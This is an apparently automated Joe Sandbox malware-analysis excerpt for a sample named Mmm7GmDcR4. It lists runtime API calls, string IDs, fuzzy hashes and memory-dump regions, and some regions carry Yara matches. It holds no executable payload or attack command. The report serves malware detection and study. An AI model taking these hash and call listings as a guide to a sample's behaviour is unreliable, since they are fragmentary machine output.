                                                                                                • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                • Instruction Fuzzy Hash: 2251C174900209AFCB10CFA8D888BFEBBF5EF49700F14416AE965E7291D730E991CB60
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
                                                                                                • __fassign.LIBCMT ref: 00433930
                                                                                                • __fassign.LIBCMT ref: 0043394B
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
                                                                                                • WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
                                                                                                • WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                • Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
                                                                                                • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                • Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 004286EB
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00428781
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00428801
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                • Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
                                                                                                • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                • Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99
                                                                                                APIs
                                                                                                • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02154ABD
                                                                                                  • Part of subcall function 02154D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021547F0), ref: 02154D9C
                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02154AD2
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02154AE1
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02154AEF
                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02154B65
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02154BA5
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02154BB3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3151764488-0
                                                                                                • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                • Instruction ID: 88707d8987ca45291e6af6463af597300facfe53764d065aa3791199090704ba
                                                                                                • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                • Instruction Fuzzy Hash: 8831C535A40224DFCF18EF64C880B6DB3BAEF44310F2545E5EC26A7285DB70EA41DA94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                • Instruction ID: 1916cf156b47c4c7815d340ed1e055477eaaac5820787bde3f2f8383b5bbcc65
                                                                                                • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                • Instruction Fuzzy Hash: 7F11DA32985119BFDB252F76AC0CD7F7A6EEF81B31B110664FC26D7250DB318561CAA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                • Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
                                                                                                • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                • Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9
                                                                                                APIs
                                                                                                  • Part of subcall function 0216A321: _free.LIBCMT ref: 0216A34A
                                                                                                • _free.LIBCMT ref: 0216A628
                                                                                                  • Part of subcall function 021636C1: HeapFree.KERNEL32(00000000,00000000,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?), ref: 021636D7
                                                                                                  • Part of subcall function 021636C1: GetLastError.KERNEL32(?,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?,?), ref: 021636E9
                                                                                                • _free.LIBCMT ref: 0216A633
                                                                                                • _free.LIBCMT ref: 0216A63E
                                                                                                • _free.LIBCMT ref: 0216A692
                                                                                                • _free.LIBCMT ref: 0216A69D
                                                                                                • _free.LIBCMT ref: 0216A6A8
                                                                                                • _free.LIBCMT ref: 0216A6B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                • Instruction ID: 17cadde971b569006b6529773757d6665568017bd2a654429b11336336e4a8a9
                                                                                                • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                • Instruction Fuzzy Hash: 6A11F471980B04BEDA20BBB1CD4DFEF779EDF04700F844825A299B6160D766B5348EA0
                                                                                                APIs
                                                                                                  • Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3
                                                                                                • _free.LIBCMT ref: 0043A3C1
                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                • _free.LIBCMT ref: 0043A3CC
                                                                                                • _free.LIBCMT ref: 0043A3D7
                                                                                                • _free.LIBCMT ref: 0043A42B
                                                                                                • _free.LIBCMT ref: 0043A436
                                                                                                • _free.LIBCMT ref: 0043A441
                                                                                                • _free.LIBCMT ref: 0043A44C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                • Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
                                                                                                • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                • Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47
                                                                                                APIs
                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02140D90,?,?,?,00000000), ref: 02142657
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02140D90,?,?,?,00000000), ref: 0214265D
                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02140D90,?,?,?,00000000), ref: 0214268A
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02140D90,?,?,?,00000000), ref: 02142694
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02140D90,?,?,?,00000000), ref: 021426A6
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021426BC
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021426CA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                • String ID:
                                                                                                • API String ID: 4227777306-0
                                                                                                • Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                • Instruction ID: b6b30ccf0e213aae7c03ec3a18609be802dedb41f6fcbb14f30c12bcb8348374
                                                                                                • Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                • Instruction Fuzzy Hash: 3F018439581115AAD724BF66DC48BAF3B69AF42B52B500425FC19D3150DF34D9448AE8
                                                                                                APIs
                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412463
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                • String ID:
                                                                                                • API String ID: 4227777306-0
                                                                                                • Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                • Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
                                                                                                • Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                • Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021466FB), ref: 021424A6
                                                                                                • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021424B4
                                                                                                • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021424C2
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021466FB), ref: 021424F0
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 021424F7
                                                                                                • GetLastError.KERNEL32(?,?,?,021466FB), ref: 02142512
                                                                                                • GetLastError.KERNEL32(?,?,?,021466FB), ref: 0214251E
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02142534
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02142542
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                • String ID: kernel32.dll
                                                                                                • API String ID: 4179531150-1793498882
                                                                                                • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                • Instruction ID: 8df2648e15285e4eb981571d35ecc29006f323f01cd3b1e9b406981b6e5ea746
                                                                                                • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                • Instruction Fuzzy Hash: 7FF081769403103FB6113B797D9996A3EACDE46A233200636FC15D2292EF75C5808A68
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2005118841-859722693
                                                                                                • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                • Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
                                                                                                • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                • Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00431738
                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                • _free.LIBCMT ref: 0043174A
                                                                                                • _free.LIBCMT ref: 0043175D
                                                                                                • _free.LIBCMT ref: 0043176E
                                                                                                • _free.LIBCMT ref: 0043177F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID: 0K
                                                                                                • API String ID: 776569668-2541285173
                                                                                                • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                • Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
                                                                                                • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                • Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0043115C
                                                                                                • _free.LIBCMT ref: 004311CD
                                                                                                • _free.LIBCMT ref: 004311E6
                                                                                                • _free.LIBCMT ref: 00431218
                                                                                                • _free.LIBCMT ref: 00431221
                                                                                                • _free.LIBCMT ref: 0043122D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 4275183328-0
                                                                                                • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                • Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
                                                                                                • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                • Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021625DC,00000001,00000001,?), ref: 021623E5
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021625DC,00000001,00000001,?,?,?,?), ref: 0216246B
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02162565
                                                                                                • __freea.LIBCMT ref: 02162572
                                                                                                  • Part of subcall function 021638FE: RtlAllocateHeap.NTDLL(00000000,0213DACD,00000000), ref: 02163930
                                                                                                • __freea.LIBCMT ref: 0216257B
                                                                                                • __freea.LIBCMT ref: 021625A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1414292761-0
                                                                                                • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                • Instruction ID: 7eadf7cf3862e3ab3d93c2d1dbc25b0cf725d514c153612fa8a09db7f1455ae8
                                                                                                • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                • Instruction Fuzzy Hash: 3B51CF72A80216AFDB358F64CC68EFF77AAEB44754F154628FD04D6150EB34DC60CA90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                • Instruction ID: 77b5ebfd6f5ebcf79e2b9e3c577bf566d26a175cae42d9c0db7248cafee2d531
                                                                                                • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                • Instruction Fuzzy Hash: 0051FB76D80215EFDF249F68CC44A7E77AAAF48324F144299EC39D6181EB31D7118A64
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02153041
                                                                                                  • Part of subcall function 02148AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02148AAD
                                                                                                • SafeSQueue.LIBCONCRT ref: 0215305A
                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 0215311A
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0215313B
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02153149
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID:
                                                                                                • API String ID: 3496964030-0
                                                                                                • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                • Instruction ID: 1481f64795c2d5c75f35ad0025bc906b4710ac5de7b8ff1664e91085b5484468
                                                                                                • Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                • Instruction Fuzzy Hash: 7031DD31A40721DFCB29EF65C880AAAB7A1BF44750F1545A9EC2A8B281DB30E845CBC0
                                                                                                APIs
                                                                                                • FindSITargetTypeInstance.LIBVCRUNTIME ref: 02158F67
                                                                                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 02158F80
                                                                                                • FindVITargetTypeInstance.LIBVCRUNTIME ref: 02158F87
                                                                                                • PMDtoOffset.LIBCMT ref: 02158FA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FindInstanceTargetType$Offset
                                                                                                • String ID:
                                                                                                • API String ID: 1467055271-0
                                                                                                • Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                                                • Instruction ID: 1f56ce214c79bb677fd9bcc994db3dac0c9a200462f402450f7300e1501e2d7f
                                                                                                • Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                                                • Instruction Fuzzy Hash: 03210B72684224EFDF14DF64DC45E6E77B6EF48710B15419AED35D3180DB31E980CA91
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                • String ID:
                                                                                                • API String ID: 1687354797-0
                                                                                                • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                • Instruction ID: ccfb9bb7cd940caf23d44884ce77efc7e1c43f9070cb07aba370b7349f47ee25
                                                                                                • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                • Instruction Fuzzy Hash: F821A172C84208AEDF16EBB4E840BDEBBFBAF08725F54402AD004B3181EB7499448F65
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,02159028,021569B9,021708F7,00000008,02170C5C,?,?,?,?,02153CA2,?,?,0045A064), ref: 0215903F
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0215904D
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02159066
                                                                                                • SetLastError.KERNEL32(00000000,?,02159028,021569B9,021708F7,00000008,02170C5C,?,?,?,?,02153CA2,?,?,0045A064), ref: 021590B8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                • Instruction ID: 43b435133ed0abe5d9e58b5b660f3f5eac8606afe8935c8695220a833b12269e
                                                                                                • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                • Instruction Fuzzy Hash: F4014732188731EEA7242BB46C89A2B274DEF01775B3003B9EC31411F0EF9288114DDA
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,7583E909), ref: 00428DD8
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
                                                                                                • SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,7583E909), ref: 00428E51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
